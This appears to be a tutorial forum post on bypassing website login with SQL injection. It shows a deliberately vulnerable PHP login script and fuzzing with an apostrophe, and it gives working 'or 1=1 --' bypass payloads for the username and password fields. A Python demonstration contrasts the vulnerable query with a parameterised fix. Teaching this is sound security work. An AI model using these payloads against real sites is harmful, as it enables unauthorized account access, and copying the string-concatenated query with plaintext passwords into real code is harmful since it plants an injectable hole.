BadB
Today we will look at bypassing authorization with SQL injection.
SQL injection is a classic web vulnerability. In this article we will see what SQL injection is, how it can be used to bypass authorization, and how it works under the hood.
How authorization works
The site asks for a username and password. The web application then asks the database: "Is there a user with the username 'Test' and the password 'root'?" If the database returns a matching row, the application treats the login as correct and lets the user in. Here is a simple PHP login script that does exactly that:
Code:
<?php
$username = $_POST['username']; // username from the login form
$password = $_POST['password']; // password from the login form
// user input is concatenated straight into the SQL text (this is the vulnerability)
$query = "SELECT username, password FROM users WHERE username = '" . $username . "' AND password = '" . $password . "' LIMIT 0,1";
$result = mysql_query($query); // run the query (legacy mysql_* extension, removed in PHP 7)
$rows = mysql_fetch_array($result); // fetch the first matching row, if any
if ($rows) // a row came back, so the credentials are accepted
{
    echo "Login successful";
    // create session or set cookies
} else {
    echo "login data invalid";
}
?>
Vulnerabilities in the code
The script takes the values entered by the user and places them directly into the SQL statement. It does not validate or escape them in any way. The query that is sent to the database is:
Code:
SELECT username, password FROM users WHERE username = '$username' AND password = '$password' LIMIT 0,1;
To find the vulnerability we do some fuzzing. Fuzzing means sending unexpected data to the site: long strings, integers, special characters and so on. If we want to break out of an SQL string literal, we send an apostrophe (single quote) or a double quote. Let's enter "user" as the username and pass' (with a trailing apostrophe) as the password. The query then becomes:
Code:
SELECT username, password FROM users WHERE username = 'user' AND password = 'pass'' LIMIT 0,1;
And accordingly, we get an SQL error:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'test' '' at line 1
The script wraps our input in single quotes. If we enter test as the password, the query contains password = 'test':
Code:
SELECT username, password FROM users WHERE username = 'user' AND password = 'test' LIMIT 0,1;
The rest of the statement (LIMIT 0,1) follows the closing quote, so this input causes no error. An extra apostrophe, however, leaves an unbalanced quote, so the statement no longer conforms to SQL syntax and the server throws an error. Now think about what happens if we enter the following as the password:
Code:
test' or 1=1 -- 
The request will look like:
Code:
SELECT username, password FROM users WHERE username = 'user' AND password = 'test' or 1=1 -- ' LIMIT 0,1;
In SQL, -- starts a comment, so if we want to comment out some part of the statement we can use it: everything that follows on the line is ignored. Two caveats for MySQL/MariaDB: the -- must be followed by a space (that is why you often see --+ in URL-based payloads, where + is decoded to a space), and # also works as a single-line comment. The statement the server effectively executes is:
Code:
SELECT username, password FROM users WHERE username = 'user' AND password = 'test' or 1=1
Now look at what the appended condition actually does:
Code:
or 1=1
The OR operator evaluates two conditions and returns true if either one (or both) is true.
So the WHERE clause is true if the password is the string test, or if 1=1. Since 1 is always equal to 1 (oddly enough), the wrong password no longer matters. Note also that AND binds tighter than OR, so the condition is read as (username = 'user' AND password = 'test') OR 1=1, which is true for every row in the table; and because the LIMIT 0,1 was commented out, the query returns all rows and mysql_fetch_array hands the script the first one, typically the first account created, which is often the administrator. This is how we bypass the password check.
But what if we don't know the password or the username?
We can use the following string as the username and anything at all as the password:
Code:
user' or 1=1 -- 
The query:
Code:
SELECT username, password FROM users WHERE username = 'user' or 1=1 -- ' AND password = 'xxxx' LIMIT 0,1;
Since everything after -- is ignored, the password check is commented out entirely, and 1=1 is true for every row, so the query returns the first user in the table. The script sees a row and logs us in.
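As an added example (not code from the original post), the following Python script reproduces the whole sequence above against an in-memory SQLite database standing in for PHP and MariaDB: the same string-built query as the PHP snippet, the apostrophe that breaks it during fuzzing, both bypass payloads, and a parameterised query that defeats them. The users table contents are constructed for the demonstration. SQLite, like MariaDB, treats '' inside a literal as an escaped quote and -- as a line comment, so the behaviour matches what the post describes.

```python
import sqlite3

# Constructed sample data standing in for the post's `users` table (not from the original).
USERS = [("admin", "s3cret"), ("user", "pass")]


def make_db():
    """Create an in-memory database with a users table like the one the PHP code queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def build_query(username, password):
    """Same string concatenation as the PHP snippet: input lands inside the quotes unescaped."""
    return ("SELECT username, password FROM users WHERE username = '" + username
            + "' AND password = '" + password + "' LIMIT 0,1")


def vulnerable_login(conn, username, password):
    """Mirror of the vulnerable PHP login.

    Returns the username of the first matching row, None when nothing matches, or the
    string 'SQL error' when an injected quote breaks the statement (the fuzzing step).
    """
    try:
        row = conn.execute(build_query(username, password)).fetchone()
    except sqlite3.OperationalError:
        return "SQL error"
    return row[0] if row else None


def safe_login(conn, username, password):
    """Hardened version: a parameterised query.

    The driver sends the values separately from the SQL text, so a quote or a comment
    marker inside them is just data and can never change the statement's structure.
    """
    row = conn.execute(
        "SELECT username, password FROM users WHERE username = ? AND password = ? LIMIT 0,1",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run every case from the post and return the outcomes keyed by scenario."""
    conn = make_db()
    return {
        "valid": vulnerable_login(conn, "user", "pass"),
        "wrong_password": vulnerable_login(conn, "user", "wrong"),
        # fuzzing: a trailing apostrophe leaves an unbalanced quote -> syntax error
        "fuzz_quote": vulnerable_login(conn, "user", "pass'"),
        # password field payload: comments out the closing quote and the LIMIT
        "password_bypass": vulnerable_login(conn, "user", "test' or 1=1 -- "),
        # username field payload: the whole password check is commented out
        "username_bypass": vulnerable_login(conn, "user' or 1=1 -- ", "xxxx"),
        # the same payloads against the parameterised query are just wrong credentials
        "safe_password_bypass": safe_login(conn, "user", "test' or 1=1 -- "),
        "safe_username_bypass": safe_login(conn, "user' or 1=1 -- ", "xxxx"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name:22s} -> {outcome}")
```

Both bypass cases come back as "admin" rather than "user": with the LIMIT commented out and OR 1=1 true for every row, fetchone() simply returns the first row in the table, which is exactly why these payloads so often land on the administrator account. The payloads carry a trailing space after -- because MariaDB only recognises the comment when a space follows it. In PHP the equivalent of safe_login is a prepared statement via mysqli or PDO; storing password hashes instead of plaintext is the other half of the fix.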